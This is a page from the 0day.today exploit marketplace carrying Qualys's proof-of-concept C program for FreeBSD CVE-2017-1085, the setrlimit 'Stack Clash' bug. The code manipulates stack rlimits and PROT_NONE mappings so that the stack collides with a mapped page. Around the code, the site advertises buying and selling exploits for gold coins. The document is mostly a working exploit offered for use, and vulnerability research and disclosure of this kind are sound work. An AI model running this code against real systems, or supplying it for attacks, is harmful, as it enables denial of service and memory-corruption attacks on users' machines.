[ 首页 ]  [ 私有 ]  [ 0Day ]  [ discount ]  [ 获取金币 ]  [ 平台 ]  [ 渗透测试 ]  [ 搜索 ]  [ 常见问题 ]  [ 联系我们 ]  [ 页面风格 ]  [ Prices in Gold ]   db: 39 452    
0day.today Exploit DB 官方脸书
0day.today Exploit DB 官方推特
0day.today Exploit DB 官方 RSS 频道
Tor
We DO NOT use Telegram or any messengers / social networks!
We DO NOT use Telegram or any messengers / social networks!

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

 
0day.today - 世界最大的漏洞利用数据库。
选择语言:  
English
English
Русский
Русский
Deutsch
Deutsch
Türkçe
Türkçe
Français
Français
Italiano
Italiano
Español
Español
Romania
Romania
Polskie
Polskie
العربية
العربية
Japan
Japan
China
China
0day.today 用户须知:
  • 我们唯一的域名:http://0day.today
  • 我们大多数的材料都完全免费
  • 如果你想购买漏洞利用 / 获取V.I.P.权限 或者使用其他付费服务,
    你需要购买或者赢取金币 金币
We accept currencies: [contact admin to find more]
           
我们不希望本站被用于黑客用途。一经查实用户有任何形式的非法访问行为,此用户的账户和数据会被从本站删除。

本站管理员使用官方账号。请谨防诈骗!
We DO NOT use Telegram or any messengers / social networks! We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
我已经是 0day.today 注册用户。 不要再显示此信息。
进站须知
  1. 请读 [ 协议 ]
  2. 请读 [ 提交 ] 规则
  3. 请访问 [ 常见问题 ] 页
  4. [ 注册 ] 用户信息
  5. 获取 [ 金币 ]
  6. 如果你想要 [ 出售 ]
  7. 如果你想要 [ 购买 ]
  8. 如果你丢失了 [ 账户 ]
  9. 如有任何问题 [ [email protected] ]


主链接


你可以由此方式联系我们

Mail:
[email protected]
Facebook:
Inj3ct0rs
Twitter:
Inj3ct0r
Telegram:
We DO NOT use Telegram or any messengers / social networks!
[ 授权 ] [ 注册 ] [ 恢复账号 ]
联系我们
你可以由此方式联系我们:
Mail:
[email protected]
Facebook:
Inj3ct0rs
Twitter:
Inj3ct0r
Telegram:
We DO NOT use Telegram or any messengers / social networks!
0day.today 漏洞利用市场和0day漏洞利用数据库

FreeBSD - setrlimit Stack Clash (PoC) Exploit

作者
Qualys Corporation
风险
[
安全风险级别 - 中
]
0day-ID
0day-ID-28050
类别
dos / poc
添加日期
29-06-2017
CVE
CVE-2017-1085
平台
freebsd/x86
/*
 * FreeBSD_CVE-2017-1085.c
 * Copyright (C) 2017 Qualys, Inc.
 *
 * This program is free software: you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program.  If not, see <http://www.gnu.org/licenses/>.
 */
 
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <sys/resource.h>
#include <sys/time.h>
#include <unistd.h>
 
#define die() do { \
    fprintf(stderr, "died in %s: %u\n", __func__, __LINE__); \
    exit(EXIT_FAILURE); \
} while (0)
 
int
main(const int argc, char * const argv[])
{
    static const struct rlimit core;
    if (setrlimit(RLIMIT_CORE, &core)) die();
 
    struct rlimit stack;
    if (getrlimit(RLIMIT_STACK, &stack)) die();
    if (stack.rlim_cur > stack.rlim_max / 3) {
        stack.rlim_cur = stack.rlim_max / 3;
        if (setrlimit(RLIMIT_STACK, &stack)) die();
        execve(*argv, argv, NULL);
        die();
    }
    char * prot_none = NULL;
    for (;;) {
        prot_none = mmap(NULL, 4096, PROT_NONE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
        if (prot_none == MAP_FAILED) die();
        if ((uintptr_t)&stack < (uintptr_t)prot_none) die();
        if ((uintptr_t)&stack - (uintptr_t)prot_none < stack.rlim_max / 3 * 2) break;
    }
    if (argc > 1) {
        stack.rlim_cur = stack.rlim_max;
        if (setrlimit(RLIMIT_STACK, &stack)) die();
    }
    *prot_none = 'A';
    printf("char at %p: %02x\n", prot_none, *prot_none);
    exit(EXIT_SUCCESS);
}

#  0day.today [2024-07-04]  #
漏洞数据库购买和出售各类漏洞利用(例如本地,远程,拒绝服务,概念验证代码,等等)
请提交至: mr.inj3ct0r[at]gmail.com
Copyright © 2008-2024 0day Today Team